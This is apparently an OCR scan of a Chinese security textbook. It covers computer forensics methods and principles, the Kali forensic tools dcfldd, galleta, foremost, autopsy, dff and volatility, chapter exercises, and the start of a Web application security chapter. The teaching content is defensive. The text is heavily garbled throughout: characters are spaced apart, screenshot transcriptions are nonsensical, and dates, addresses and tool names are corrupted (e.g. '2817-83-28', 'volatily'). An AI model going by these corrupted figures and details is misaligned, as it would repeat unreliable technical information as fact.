4. 定期 检查 和 安全 更 新 

管理 员 必 须 定期 使 用 各 类 渗透 或 攻击 工具 对 系统 进行 安全 体检 ,应 用 HIPS 系统 定 
期 扫描 分 析 各 类 系统 日 志 , 及 时 发 现 并 消除 安全 隐患 。 管 理 员 必 须 定期 跟踪 最 新 的 内 核 
补丁 和 应 用 程序 补丁 信息 ,第 一 时 间 更 新 系统 ,确保 系统 处 于 最 新 的 安全 保护 状态 。 


12.3 计算 机 取证 


在 系统 受到 攻击 时 ,必定 会 留 下 攻击 的 痕迹 ,计算 机 取证 就 是 寻找 这 些 攻击 行为 留 下 
的 蛛丝马迹 ,作为 事后 追踪 或 司法 起 诉 攻 击 者 的 计算 机 证 据 。 计 算 机 取证 (computer 
forensics) 指 运用 技术 手段 对 计算 机 犯罪 行为 进行 分 析 以 确认 攻击 行为 并 获取 数字 证 据 ， 
并 据 此 提起 司法 诉讼 ,也 就 是 针对 计算 机 入 侵 与 犯罪 进行 证 据 获取 、 保 存 . 分 析 和 出 示 晕 。 

计算 机 证 据 指 在 系统 运行 过 程 中 产生 和 记录 的 内 容 , 可 以 用 于 证 明 案 件 事实 的 数字 
记录 , 它 实 际 是 一 个 对 受 攻击 系统 进行 扫描 和 破解 以 及 对 攻击 事件 进行 重建 的 过 程 。 计 
算 机 取证 在 打击 网 络 犯罪 中 的 作用 十 分 关键 , 它 的 目的 是 要 将 攻击 者 留 在 系统 中 的 “ 痕 
迹 ” 作 为 有 效 的 诉讼 证 据 提供 给 法 庭 , 以 便 将 犯罪 嫌疑 人 绳 之 以 法 。 因 此 ,计算 机 取证 是 
计算 机 领域 和 法 学 领域 的 一 门 交叉 科学 ,被 用 来 解决 大 量 的 计算 机 犯罪 和 事故 ,包括 网 络 
攻击 和 网 络 欺 骗 等 。 

可 以 用 做 计算 机 取证 的 信息 源 很 多 ,如 系统 日 志 、 防 火 墙 与 IPS 的 日 志 、 反 病毒 软件 
日 志 、 系 统 审计 日 志 、 网 络 监控 流量 .电子 邮件 、 操 作 系 统 文件 .数据库 操作 日 志 、 程 序 设 
置 、 完 成 特定 功能 的 脚本 文件 .Web 浏览 器 缓存 历史 记录 或 会 话 日 志 、 实 时 聊天 记录 等 。 
虽然 攻击 者 会 采用 各 种 痕迹 清除 工具 将 自己 的 攻击 痕迹 尽量 清除 ,如 删除 或 修改 日 志 
件 及 其 他 有 关 记 录 。 但 是 一 般 的 删除 文件 操作 ,即使 在 清空 回收 站 以 后 ,如 果 不 是 对 硬盘 
进行 低级 格式 化 处 理 , 仍 有 可 能 被 恢复 。 


®D http://wiki. ubuntu. com. cn/Security。 
@ https://baike. baidu. com/item/ 计 算 机 取证 。 


网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 





12.3:1 取证 方法 


计算 机 取证 的 方法 非常 多 ,而 且 在 取证 过 程 中 又 涉及 对 数字 证 据 的 分 析 , 取 证 与 分 析 
两 者 很 难 完全 孤立 开 来 ,所 以 对 计算 机 取证 的 分 类 十 分 复杂 ,往往 难以 按 一 定 的 标准 进行 
合理 分 类 。 通 常情 况 下 根据 证 据 用 途 不 同 分 为 两 类 ,一 类 是 来 源 取证 , 另 一 类 是 事实 
取证 。 

1. 来 源 取证 

来 源 取证 指 取 证 的 目的 主要 是 确定 攻击 者 或 者 证 据 的 来 源 。 例 如 ,寻找 攻击 者 使 用 
的 IP 地 址 就 是 来 源 取证 ,主要 包括 IP 地 址 取证 .MAC 地 址 取证 .电子 邮件 取证 和 软件 账 
号 取证 等 。 

(1) IP 地 址 取证 利用 互联 网 中 每 台 主 机 都 有 唯一 的 全 局 IP 地 址 ,根据 日 志 中 找到 的 
IP 地 址 信息 ,可 以 进一步 确定 攻击 者 位 置 ,再 进一步 确定 攻击 者 身份 。 

(2) MAC 地 址 取证 用 于 局 域 网 或 动态 分 配 IP 地 址 的 网 络 ,根据 物理 地 址 与 IP 地 址 
的 映射 关系 ,找到 物理 地 址 即 可 找到 对 应 IP 地 址 ,可 以 用 来 确定 攻击 者 身份 。 

(3) 电子 邮件 取证 指 根据 邮件 头 部 信息 找到 发 送 主机 的 IP 地 址 ,进一步 确定 攻击 者 
身份 。 

(4) 软件 账号 取证 指 特定 软件 的 某 个 登录 账号 与 攻击 者 存在 一 一 对 应 关系 时 ,可 以 
用 来 确定 攻击 者 。 

2. 事实 取证 

事实 取证 指 取证 目的 不 是 为 了 确定 攻击 者 ,而 是 取得 证 明 攻 击 过 程 相关 事实 的 数字 
证 据 。 常 见 的 取证 方法 有 文件 内 容 调查 ,使 用 痕迹 调查 .软件 功能 分 析 、 软 件 相似 性 分 析 、 
日 志文 件 分 析 、 网 络 状态 分 析 和 网 络 报 文 分 析 等 。 

(1) 文件 内 容 调 查 指 在 存储 设备 中 取得 文档 、 图 片 、 音 频 、 视 频 、 动 画 、 网 页 和 电子 邮 
件 内 容 等 文件 的 全 部 内 容 , 以 及 这 些 文件 被 删除 以 后 、 系 统 被 格式 化 后 通过 数据 恢复 的 部 
分 或 全 部 内 容 。 

(2) 使 用 痕迹 调查 包括 系统 运行 的 痕迹 ,如 运行 历史 记录 搜索 历史 记录 打开 /保存 
文件 记录 ,临时 文件 夹 .最 近 访问 的 文件 ,网 络 访问 痕迹 ,如 缓存 .历史 记录 、Cookie 等 ,以 
及 其 他 应 用 软件 的 使 用 历史 记录 。 

(3) 软件 功能 分 析 主 要 针对 特定 软件 及 程序 的 性 质 和 功能 进行 分 析 , 如 对 恶意 代码 的 
分 析 , 确 定 其 破坏 性 ,传染 性 等 特征 ,此 类 取证 方法 通常 在 破坏 、 入 侵 \ 病 毒 行为 发 生 时 使 用 。 

(4) 软件 相似 性 分 析 指 比较 两 种 软件 , 找 出 它们 是 否 存在 相似 的 证 据 。 此 类 取证 方 
法 主要 用 于 识别 侵犯 软件 版 权 或 者 识别 恶意 代码 变种 。 

(5) 日 志文 件 分 析 指 对 系统 日 志 , 数 据 库 日 志 、 网 络 日 志 、 应 用 程序 日 志 等 进行 分 析 ， 
发 现 系统 是 否 存在 入 侵 行 为 或 者 其 他 非法 访问 行为 的 证 据 。 

(6) 网 络 状态 分 析 指 获取 指定 时 刻 的 主机 联网 状态 ,如 网 络 中 的 哪些 主机 与 本 机 相 
连 , 本 机 开启 了 哪些 服务 ,哪些 用 户 登录 到 本 机 等 。 

(7) 网 络 报 文 分 析 指 分 析 网 络 报 文 发 现 相关 证 据 的 过 程 ,主要 用 于 实时 取证 ,实质 就 
是 网 络 监听 




















第 12 章 “恶意 代码 防范 与 系统 安全 \®/ 


12.3.2 取证 原则 和 步骤 


计算 机 取证 的 主要 原则 是 : 

(1) 尽早 搜集 证 据 ,并 保证 其 没有 受到 任何 破坏 。 

(2) 必须 保证 “证 据 连 续 性 ”, 在 证 据 被 正式 提交 给 法 庭 时 ,必须 能 够 说 明 从 最 初 的 获 
取 状 态 到 在 法 庭 上 出 现 这 段 时 间 内 ,证 据 所 出 现 的 任何 变化 的 原因 。 

(3) 检查 和 取证 过 程 必 须 全 程 接 受 第 三 方 监督 。 

在 保证 以 上 3 项 基本 原则 的 情况 下 ,计算 机 取证 工作 一 般 按照 下 面 步骤 进行 : 

Q@ 保护 目标 系统 ,避免 发 生 任何 的 改变 ,伤害 ,数据 破坏 或 病毒 感染 ; 

@ 搜索 目标 系统 中 的 所 有 文件 ,包括 现存 的 正常 文件 .已 经 被 删除 但 仍 存在 于 磁盘 
上 的 文件 、 隐 藏 文件 .受到 密码 保护 的 文件 和 加 密 文 件 ; 

@ 尽 可 能 恢复 已 删除 文件 ; 

@ 最 大 限度 地 显示 操作 系统 或 应 用 程序 使 用 的 隐藏 文件 ,临时 文件 和 交换 文件 的 
内 容 ; 
@ 如 果 可 能 并 且 法 律 允许 ,访问 被 保护 或 加 密 文件 的 内 容 ; 

@ 分 析 在 磁盘 的 特殊 区 域 中 发 现 的 相关 数据 ,如 未 分 配 的 磁盘 空间 、 文 件 中 的 
“slack" 空 间 等 ; 

@ 打印 目标 系统 的 全 面 分 析 结 果 , 然 后 给 出 分 析 结 论 ,包括 系统 的 整体 情况 ,发 现 的 
文件 结构 .数据 和 作者 的 信息 ,对 信息 的 任何 隐藏 删除 、 保 护 、 加 密 企图 ,以 及 在 调查 中 发 
现 的 其 他 相关 信息 ; 

@) 给 出 必需 的 专家 证 明 。 

上 述 取证 原则 及 步骤 属于 静态 方法 ,是 在 事件 发 生 后 所 采取 的 静态 分 析 操作 。 但 是 ， 
随 着 网 络 攻 击 技术 手段 的 不 断 发 展 ,纯粹 的 静态 分 析 已 经 无 法 满足 要 求 , 今 后 的 发 展 趋势 
是 将 计算 机 取证 与 IPS 等 网 络 安全 工具 相 结 合 , 进 行动 态 取证 ,整个 取证 过 程 将 更 加 系统 
并 具有 智能 性 ,也 将 更 加 灵活 多 样 。 

由 于 计算 机 证 据 容易 被 伪造 和 算 改 而 且 不 留 痕 迹 ,同时 由 于 人 为 原因 或 环境 和 技术 
条 件 的 影响 容易 出 错 ,因此 ,往往 将 计算 机 证 据 归 入 间接 证 据 。 计 算 机 取证 目前 还 处 于 辅 
助 取证 的 地 位 , 它 的 主要 作用 是 获取 与 案件 相关 的 线索 并 且 起 辅助 证 明 作用 。 


12.3.3 取证 工具 


当前 市 场 上 存在 众多 的 计算 机 取证 工具 ,包括 商用 软件 和 开源 软件 ,本 节 主 要 介绍 
Kali Linux 2.0 中 集成 的 一 些 常 用 开源 取证 工具 ,包括 磁盘 数据 捕获 工具 dcfldd、IE 
Cookie 分 析 工 具 galleta、 文 件 分 析 工 具 foremost 和 autopsy、 数 字 取 证 框架 dff 和 内 存 分 
析 工 具 volatily 等 。 

1. dcfldd 

dcfldd 是 磁盘 备份 工具 dd 的 加 强 版 ,用 于 复制 整个 分 区 或 者 整 张 磁盘 ,以 及 其 他 工 
具 取 证 分 析 。 下 面 给 出 一 个 简单 示例 .将 /dev/sda 磁盘 内 容 的 前 10000 个 扇 区 复制 到 
/tmp/backup 文件 上 : 
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// 如 果 没有 count 选项 , 则 把 磁盘 全 部 复制 到 backup 文件 
dcfldd if = /dev/sda of = /tmp/backup count = 10000 


2. galleta 

浏览 器 的 Cookie 文件 保存 用 户 访问 网 站 的 各 项 敏感 信息 ,如 用 户 登录 凭证 等 。 攻 击 
者 可 以 提取 这 些 然后 冒充 用 户 身 份 访问 相应 网 站 。galleta 就 是 一 款 针 对 I 浏览 
的 Cookie 信息 提取 工具 ,使 用 非常 简单 ,可 以 十 分 轻松 地 读 取 并 且 在 终端 显示 Cookie . 
件 中 的 有 用 信息 。 图 12-26 给 出 了 一 个 提取 网 站 “ynuf. alipay. com” 的 Cookie 文件 示例 ， 
可 以 看 到 该 Cookie 数据 名 称 是 “umdata_”, 创 建 于 2017. 05. 12。 









图 12-26 ”galleta 使 用 示例 

3. foremost 

foremost 是 一 个 基于 文件 的 头 部 和 尾部 信息 以 及 文件 的 内 建 数据 结构 对 文件 进行 
恢复 的 命令 行 工 具 , 它 可 以 分 析 由 dd 和 Encase 等 工具 生成 的 镜像 文件 ,也 可 以 直接 分 析 
某 个 驱动 器 或 分 区 文件 。 文件 头 和 尾 可 以 通过 配置 文件 “/etc/foremost. conf” 设 置 , 也 可 
以 直接 通过 开关 选项 指定 其 支持 的 文件 类 型 。foremost 支持 众多 的 文件 系统 和 文件 类 
型 ,如 ext2 .ext3 ,vfat NTFS 等 。 

图 12-27 给 出 了 foremost 的 使 用 示例 ,首先 将 多 个 PNG 类 型 的 图 片 文件 合并 成 
为 “1. dd” 的 文件 ,然后 尝试 使 用 foremost 从 “1. dd” 中 恢复 PNG 图 片 文件 。 图 12-27(a) 最 下 
面 一 行 可 以 看 到 恢复 的 3 个 PNG 文件 ,图 12-27(b) 是 相应 的 分 析 过 程 审计 日 志 。 
foremost 为 每 次 分 析 生 成 一 个 “audit. txt” 日 志 , 该 日 志 显 示 此 次 分 析 提 取出 3 个 PNG 类 
型 的 文件 。 
















rds Kendsll, and Mick 





(a) (b) 


图 12-27 foremost 使 用 示例 


4. autopsy 
autopsy 是 一 个 基于 UNIX 和 Windows 的 取证 分 析 工 具 , 包 括 许多 模块 ,它们 可 以 
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分 析 磁 盘 映 像 , 对 文件 系统 进行 深入 分 析 等 。 它 提供 一 个 Web 服务 接口 (URL 是 
http://localhost:9999/autopsy) ,用 户 可 以 使 用 浏览 器 进行 图 形 化 操作 。 图 12-28 示例 
加 载 一 个 镜像 文件 的 过 程 ,首先 调用 dcfldd 得 到 磁盘 的 前 22503 个 扇 区 并 写 入 文件 
“2. dd” ,然后 使 用 autopsy 加 载 该 文件 。 图 12-29 给 出 了 autopsy 分 析 “2. dd” 文 件 所 恢复 
的 部 分 文件 和 目录 











人 open mage ntesth. * (Wh Ptiplloc recmoder0 2 | # 


寺 Blocalhost 


File Edi View Search Terminal Help 





Most Vistedw Ofensve Securty kai nux al Docs VKal Tools BExplor-D8 则 























Case: test 
Host: host! 
Select a volume to analyze or add a new 
ER GAS 
mount name ts type 
®@ 以 2.dd-0-0 ext 
增加 三 各 名作 文件 
ua 
ERsAcryY ess os, mE RY 一 / 
— YEN 一 YR) 
图 12-28 autopsy 装 和 人 镜像 文件 示例 
FheNnms JRerwomeseway FaETyrE ) WarOemss) MemDAr DamUnr ] Har cuoscl 
OO i : 
Type Wr 
wl. Wa 
did iamhanFilesf 。 000000.00 
00:00:00 (UTC) 
dld 心 2016-10-02 
22:33:22 (EDT) 
dild 4 2016-10-02 
22:33:22 (EDT) 
Y Fr/r jiant- 2016-10-04 
ante 01:15:00 (EDT) 
rir 9 2015.08.08 
03;26:13 (EDT) 
di- bin 0000-00-00 
00:00:00 (UTC) 
dl- boot 
00:00:00 (UTC) 
di- der 0000-00-00 
00:00:00 (UTC) 
dl ate 0000-00-00 
目录 和 文件 00:00:00 (UTC) 
di- home 0000-00-00 
00:00:00 (UTC) 
M1 initre.ing 2015.08-10 
17-47:47 IPNTY 
图 12-29 autopsy 分 析 “2. dd” 文 件 的 部 分 结果 
5 df 


数字 取证 框架 (Digital Forensics Framework ,dff0) 是 专门 用 于 数字 取证 的 流行 开源 
平台 ,具有 GPL 许可 证 ,简单 易 用 。 它 可 以 用 于 Windows 或 Linux 操作 系统 的 取证 , 恢 
复 已 删除 的 文件 ,快速 搜索 文件 的 元 数据 及 其 他 功能 。 

针对 前 面 生成 的 “1. dd” 和 “2. dd” 镜 像 文件 ,dff 在 加 载 它们 进行 分 析 时 ,会 自动 关联 
和 推荐 对 应 的 模块 ,如 “1. dd” 自 动 关联 了 “pictures” 模 块 ,如 图 12-30 所 示 。 用 户 也 可 以 





DD http://www. digital-forensic. org/。 
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调用 其 他 模块 进行 分 析 , 图 12-31 列 出 了 使 用 *pictures” 模 块 抽取 *1. dd” 中 的 PNG 图 像 
的 结果 示例 。 图 12-32 列 出 了 使 用 “extfs” 模 块 对 磁盘 镜像 *2. dd” 进 行 分 析 的 结果 ,与 
图 12-29 中 autopsy 的 分 析 结 果 类 似 , 也 得 到 了 部 分 的 目录 和 文件 信息 。 
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图 12-30 dff 对 镜像 文件 使 用 pictures 模块 示例 


File Edt Module View IDE ? 
/Open evidence ©S Open device Browser 田 Console 旺 Live scripting 所 IDE 


Browser “Task Manager @D Output vewenmage 1 


viewerimage 1 








图 12-31 dff 的 pictures 模块 分 析 “1. dd” 的 结果 示例 


6. volatility 

volatility 是 一 个 内 存 取证 框架 ,主要 用 于 事件 响应 和 软件 分 析 。 它 可 以 从 进 
程 、 网 络 套 接 字 、 网 络 连接 .DLL 和 注册 表 提 取信 息 , 它 甚至 支持 从 Windows 故障 转 储 文 
件 提取 信息 

图 12-33 给 出 了 volatility 分 析 内 存 镜像 文件 类 型 的 示例 ,“1. vmem” 是 类 型 为 
“Windows Server 2003 SP0” 的 一 个 VMWare 内 存 镜 像 快 照 文 件 , volatility 使 用 
“imageinfo” 模 块 进行 分 析 , 推 导出 3 种 可 能 的 Profile 值 。 然 后 ,volatility 使 用 这 些 Profile 
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Fie Edt Module View IDE 7? 
,sOpenevidence 加 Open device ”Browser 时 Console 旺 Live scripting 所 IDE 





Browser Task Manager ©@ output 
































Browser 画 回 
二 
IE 
Name mn Attrbute 
刀口 昌 Locat devices name 
vdSiugcalmes OEo 0 /Logical fles/2.de/Extfs/Fle system/ i 
pp 口 ”bm /Logical fles/2.dd/Extfs/File system/ md by 
vO Es Ob o /Legical fles/2.de/Extfs/File system/ 
- 口 ”dev /Logical les/2.ddExtfsyFile system/ 
"CR ,.. o /Logical fles/2 dd/Extfs/File system/ v mtributes 
Tov lo E rp eds 
Oe intrdimg 9 /Logical fles/2. dd/Extfs/File system/ accessed 
#0.4.. om o /Logical fles/2.de/Extfs/File system/ i 
De NO iwebuu 0 /Logical fles/2. dd/Extfs/File system/ i 
#0 sos ND vhosttround 9 /Logical fles/2.de/Extfs/File system/ ea 
Wa dm 0 /Logical fles/2.de/Extts/File system/ pe 
of Woe EY a wnt 0 /Logical files/2 dd/Extfs/File system/ 
?二 口 中 Modulesroot Oopt 0 Mogical fles/2.ddExtfsyFie system/ magk 
吉 口 请 Bookmares 用 口 ”proc 9 Logical fles/2 dd/Extfs/File system/ magee mm 
图 12-32 dff 使 用 extfs 模块 恢复 磁盘 镜像 文件 2. dd 的 部 分 目录 和 文件 


调用 其 他 分 析 模块 对 “1. vmem” 中 的 在 





1 已 、 


进行 分 析 。 图 12-34 给 出 了 volatile 调用 “sockets” 


模块 获得 当时 开放 的 网 络 端口 情况 的 示例 ,指定 了 Profile 为 “Win2003SP1x86”。 





NFO ~ : wolatiliry-dehug 。 : Deternining 
Suggested ProfileCs) 
AS Layerl := 
AS Layer2 : 
er2083 .unen)| 
PAE type : PAE 
DTB : Bx4oeB0L 
KDBG eBL 
Nunbor of Processore 
Inage Type CService Pack) 
KPCR for CPU © : Bxffdff000L 
MUSER_SHARED_DATA : Bxffdf0000L 


olatility 2.6_win64_standalon 


:workdir wolatility 2.6_win64 standaloneYvolatility 2.6_win64 standalone.exe 一 
Di workdin 网络 安全 29i6 winsorver2903\1 unon [rearTa] 
olatility Foundation Uolatility Pranework 2.6 


inageinfo 





no such optio 











Inage date and tine 
Image local date and tine 


2817-83-28 98:34:12 UTC+9899 
2817-83-28 16:34:12 +8888 














Volatility Foundation Volatility Pranevork 2.6 





图 12-33 分 析 内 存 镜像 文件 的 类 型 示例 





‘workdir wolatility 2.6_win64_standalone wo; 
D: workdirN 网 络 安全 2816 winserver2883\ .vnen| 














Dffset cy) PID Port Proto Protocol Address Create Tine 
Bx8775bbe8 1176 。 1833 6 TCP 日 .8.B.B 2817-93-28 86: 
31:37 UTC+9699 
Bx8777d2e8 1176 1831 6 TCP 9.8.8.0 2817-93-28 86: 
31:3? UIC+*9008 
Bx8789be98 1176 ”1839 6 TCP 2817-93-28 86: 
31:36 UTC+89988 
Bx883echb79 1944 。 1929 6 TCP 2817-93-28 86: 
29:18 UIC+*G688 
Bx8778be98 928 1826 6 TCP 2817-93-28 96: 
29:19 UTC+9989 
Bx882e8B88 1776 1825 6 TCP 2817-93-28 86: 
28:59 UTC+9898 
Bx875h2e88 368 1832 17 UDP 2817-83-28 
31:37 UTC+*9888 
Bx87930e28 18044 i928 17 UDP 28917-93-28 

123 17 UDP 127. 2817-93-28 87: 
28:54 UTC+9888 
Bx877bbd8@ 1176 3456 17 UpP 127.8.8.1 2817-93-28 66: 


31:37 UTC+9998 





12-34 ”调用 “sockets” 模 块 分 析 网 络 连 接 
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12.4 小 结 


恶意 代码 的 重要 特性 是 独立 性 和 自我 复制 性 ,根据 是 否 具备 这 两 种 特性 ,可 以 将 恶意 
代码 分 为 4 类, 分别 是 病毒 蠕虫 .后门 和 木马 。 恶 意 代 码 的 编写 语言 和 实现 机 制 虽然 各 
自 不 同 , 但 是 都 具备 相似 的 攻击 步骤 ,包括 入 侵 系 统 、 维 持 权限 、 隐 项 、 潜 伏 和 破坏 。 

通用 的 恶意 代码 防范 技术 包括 特征 码 、 校 验 和 、 沙 箱 和 蜜 缸 等 ,针对 病毒 的 防范 方法 
包括 通用 解密 、 数 字 免 疫 和 行为 阻 断 , 针 对 蠕虫 的 防范 方法 包括 基于 速率 和 阅 值 的 检测 、 
提前 阻 断 方法 和 基于 网 络 的 协作 ,针对 木马 的 防范 方法 包括 检测 网 络 状态 .检测 进程 与 服 
务 .检测 系统 启动 项 .检测 系 统 账户 和 使 用 专用 工具 检测 等 。 

病毒 .木马 和 蠕虫 之 间 存 在 很 大 差别 ,病毒 侧重 于 破坏 系统 和 程序 的 能 力 ,木马 侧 重 
于 窃取 敏感 信息 的 能 力 , 蠕 虫 侧重 于 网 络 中 的 自我 复制 能 力 和 自我 传染 能 力 。 

操作 系统 的 安全 机 制 是 保证 系统 安全 的 基础 。Windows 7 系统 包括 内 核 完 整 性 .内 
存 保护 和 用 户 权限 控制 等 组 件 。 内 核 完整 性 使 得 恶意 代码 无 法 修改 系统 内 核 , 内 存 保 护 
的 栈 溢出 处 理 、.SafeSEH、DEP 和 ALSR 机 制 使 得 攻击 者 很 难 成 功利 用 漏洞 在 远程 系统 
执行 代码 ,用户 权 限 机 制 的 UAC,BitLocker、Defender 和 资源 保护 机 制 极 大 增加 了 攻击 
者 越权 访问 的 难度 。 

Windows 系统 自 带 许多 安全 策略 设置 ,在 合理 设置 后 ,系统 安全 性 会 有 较 大 提升 。 
通用 的 Windows 系统 安全 策略 包括 账户 密码 策略 .账户 锁定 策略 .账户 控制 策略 .用户 权 
限 分 配 策略 .计算 机 安全 选项 .计算 机 审核 策略 、. 端 口 和 服务 策略 ,文件 和 目录 安全 访问 策 
略 等 。 

Linux 是 免费 使 用 和 自由 传播 的 类 UNIX 操作 系统 , 它 提 供 的 安全 机 制 主要 有 身份 
标识 与 鉴别 .文件 访问 控制 .特权 管理 .安全 审计 等 。Linux 基于 账号 和 密码 对 用 户 进行 
管理 ,结合 PAM 机 制 进行 身份 认证 ,可 以 基于 libpam_cracklib 库 实现 类 似 Windows 密 
码 的 复杂 性 策略 。Linux 文件 访问 控制 机 制 基于 自主 访问 ,为 文件 的 创建 者 .用 户 组 和 其 
他 用 户 分 别 建立 读 、. 写 和 执行 权限 。Linux 特权 管理 继承 了 UNIX 做 法 ,并 引入 了 能 力 的 
概念 ,结合 SETUID 程序 机 制 , 在 每 个 进程 执行 某 项 特权 操作 时 ,只 需要 检测 其 是 否 具备 
相应 的 能 力 即 可 。Linux 系统 有 着 强大 的 审计 日 志 系 统 , 几 乎 对 系统 中 发 生 的 重要 事件 
都 会 记录 在 相应 的 日 志文 件 中 。 

计算 机 取证 寻找 攻击 行为 留 下 的 蛛丝马迹 ,运用 技术 手段 对 计算 机 犯罪 行为 进行 分 
析 以 确认 攻击 事实 ,作为 事后 追踪 或 司法 起 诉 攻击 者 的 计算 机 证 据 。 取 证 方法 分 为 来 源 
取证 和 事实 取证 ,来 源 取证 包括 IP 地 址 取证 .MAC 地 址 取证 .电子 邮件 取证 和 软件 账号 
取证 等 ,事实 取证 包括 文件 内 容 调 查 、 使 用 痕迹 调查 .日 志文 件 分 析 、 网 络 状态 分 析 等 。 取 
证 的 原则 主要 有 三 点 , 即 保证 证 据 免 受 破坏 、 证 明证 据 的 连续 性 和 接受 第 三 方 全 程 监督 。 

计算 机 取证 工具 种 类 众多 ,Kali Linux 集成 的 开源 取证 工具 主要 有 文件 恢复 命令 行 
工具 foremost、 基 于 Web 接口 的 文件 恢复 工具 autopsy、 跨 平台 的 数字 取证 框架 dff 以 及 
内 存 取 证 框架 volatility。 
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习 题 


12-1 反 病 毒 软件 采用 的 主动 防御 技术 可 以 被 划分 为 第 12. 1. 1 节 的 哪 种 病毒 防范 
方法 ? 

12-2 请 解释 为 什么 通用 解密 技术 的 最 大 难点 在 于 时 间 无 法 确定 。 

12-3 ”在 蠕虫 检测 中 ,基于 速率 限制 ,基于 速率 的 中 断 机 制 和 PWC 中 的 阔 值 分 析 三 
种 机 制 有 何 区 别 ? 

12-4 在 Windows 中 如 何 通过 netstat 命令 跟踪 某 个 端口 所 属 进程 ”如 果木 马 使 用 
了 端口 重用 技术 ,如 何 判 断 系 统 是 否 在 运行 木马 服务 程序 ? 

12-5 简 述 病毒 .蠕虫 和 木马 的 区 别 。 

12-6 ”如果 你 作为 Windows 管理 员 ,在 工作 时 并 不 希望 总 是 弹出 权限 提升 的 警告 窗 
口 ,你 将 如 何 配置 系统 ? 

12-7 你 作为 Windows 的 管理 员 ,希望 系统 能 够 做 到 : 

(1) 记录 所 有 的 账号 变化 情况 ; 

(2) 避免 远程 弱 口令 攻击 ; 

(3) 要 求 所 有 账号 的 密码 至 少 需要 8B, 至 少 包含 3 类 字符 ; 

(4) 记录 所 有 的 成 功 登 录 事 件 。 

应 该 如 何 进行 系统 配置 ? 

12-8 ”Linux 如 何 进行 系统 配置 ,完成 类 似 第 7 题 的 要 求 ? 

12-9 练习 使 用 dcfldd 制作 磁盘 镜像 ,并 尝试 使 用 foremost 和 autopsy 还 原 其 中 的 
文件 和 目录 信息 。 

12-10 ”练习 使 用 内 存 分 析 工 具 volatility, 对 Linux 虚拟 机 和 Windows 虚拟 机 的 内 
存 快照 进行 分 析 。 
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草 


Web 程序 安全 


学 习 要 求 : 

。 理解 Web 程序 的 核心 安全 问题 和 防御 机 制 。 

。 理解 安全 相关 的 HTTP 协议 内 容 和 数据 编码 形式 。 

。 掌握 验证 机 制 的 攻击 方法 ,漏洞 产生 原因 和 防御 机 制 。 

。 掌握 会 话 管理 的 攻击 方法 ,漏洞 产生 原因 和 防御 机 制 。 
掌握 SQL 注入 的 攻击 方法 、 漏 洞 产生 原因 和 防御 机 制 。 
掌握 各 种 XSS 漏洞 的 攻击 方法 、 漏 洞 产 生 原因 和 防御 机 制 。 


Web 程序 安全 是 网 络 安全 研究 领域 的 热点 问题 之 一 。 因 为 Internet 上 的 大 多 数 
Web 站 点 实际 上 都 是 应 用 程序 ,它们 功能 强大 ,在 服务 器 和 浏览 器 之 间 进 行 双向 信息 传 
递 。 用 户 从 Web 程序 中 获取 的 内 容 大 部 分 属于 私密 和 高 度 敏感 的 信息 ,因此 安全 问题 至 
关 重 要 ,如 果 人 们 认为 某 个 Web 程序 不 够 安全 ,他 们 就 会 拒绝 使 用 。 

因为 Web 程序 各 不 相同 ,所 包含 的 安全 问题 也 不 相同 ,而 且 许多 Web 程序 常常 由 一 
两 名 开发 人 员 独 立 开发 ,但 是 他 们 可 能 根本 不 了 解 所 编写 的 代码 可 能 引起 的 安全 问题 ,这 
就 使 得 Internet 上 有 相当 多 的 Web 程序 存在 各 种 各 样 的 安全 漏洞 。 更 为 严重 的 是 ,Web 
程序 为 了 实现 核心 功能 ,通常 要 与 内 部 服务 器 系统 建立 各 种 连接 ,而 这 些 系 统 往往 保存 高 
度 敏感 的 信息 ,拥有 很 高 的 权限 ,可 以 执行 十 分 强大 的 功能 。 因 此 ,一 个 潜在 的 Web 程序 
漏洞 可 能 造成 极其 严重 的 后 果 , 带 来 巨大 的 经 济 损失 。 

本 章 主 要 基于 Web 程序 安全 机 制 的 实现 方法 ,探讨 几 种 严重 威胁 Web 程序 安全 性 
的 漏洞 的 基本 原理 以 及 相应 的 漏洞 挖 握 和 防御 技术 ,包括 验证 机 制 的 安全 性 ,会 话 管理 机 
制 的 安全 性 、 数 据 存 储 区 的 安全 性 和 Web 用户 的 安全 性 。 


13.1 安全 问题 与 防御 机 制 


Web 程序 的 主要 目的 是 执行 各 种 可 以 在 线 完成 的 有 用 功能 ,常见 功能 包括 购物 、 社 
交 网 络 、 电 子 银行 .搜索 、 电 子 邮 件 和 博客 等 。Web 程序 在 Internet 上 广泛 流行 的 主要 原 
因 如 下 : 

(1) Web 浏览 器 的 功能 非常 强大 ,可 以 创建 内 容 丰 富 的 用 户 界面 ,并 且 使 用 标准 控 
件 , 用 户 很 容易 即时 熟悉 Web 程序 的 功能 。 

(2) Web 用 户 只 需要 在 计算 机 或 移动 设备 上 安装 浏览 器 ,无 须 安装 客户 端 软件 , Web 
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程序 就 会 自动 为 用 户 部 署 界面 。 


(3) 开发 Web 程序 的 核心 技术 和 编程 语言 相对 传统 C 和 汇编 语言 更 为 简单 ,即使 初 
学 者 也 可 以 开发 出 较为 强大 的 Web 程序 。 

(4) HTTP 协议 作为 Web 程序 的 通信 协议 属于 无 状态 协议 ,提供 了 通信 和 错误 的 容错 
性 。 而 且 ,HTTP 既 可 以 通过 代理 或 其 他 协议 传输 ,也 可 以 基于 SSL 等 安全 传输 协议 进 
行 通 信 。 

大 多 数 Web 程序 都 声称 自己 是 安全 可 靠 的 ,因为 它们 使 用 了 类 似 SSL 之 类 的 安全 
传输 协议 ,并 要 求 用 户 核实 站 点 证 书 或 者 进一步 要 求 用 户 提供 数字 证 书 以 验证 通信 双方 
的 身份 ,从 而 消除 用 户 对 安全 问题 的 担忧 。 实 际 上 它们 并 不 安全 ,即使 使 用 了 SSL 协议 ， 
Web 程序 依然 存在 各 种 各 样 的 漏洞 : 

QO 不 完善 的 身份 验证 机 制 。 这 类 漏洞 包括 登录 验证 机 制 中 的 各 种 缺陷 ,可 能 允许 攻 
击 者 破解 口令 或 者 绕 开 登录 验证 。 

@ 不 完善 的 会 话 管理 机 制 。Web 程序 没有 为 用 户 数据 提供 全 面 保护 ,攻击 者 可 以 查 
看 其 他 用 户 的 敏感 信息 或 者 执行 特权 操作 。 

@ SQL 注入 。 攻 击 者 可 以 提交 专门 设计 的 输入 ,破坏 或 改变 Web 程序 与 后 台数 据 
存储 区 的 交互 操作 ,从 而 获取 敏感 数据 或 者 直接 在 服务 器 上 执行 命令 。 

@ 跨 站 点 脚本 。 攻 击 者 可 以 利用 该 漏洞 攻击 其 他 用 户 、 访 问 他 们 的 信息 .代表 他 们 
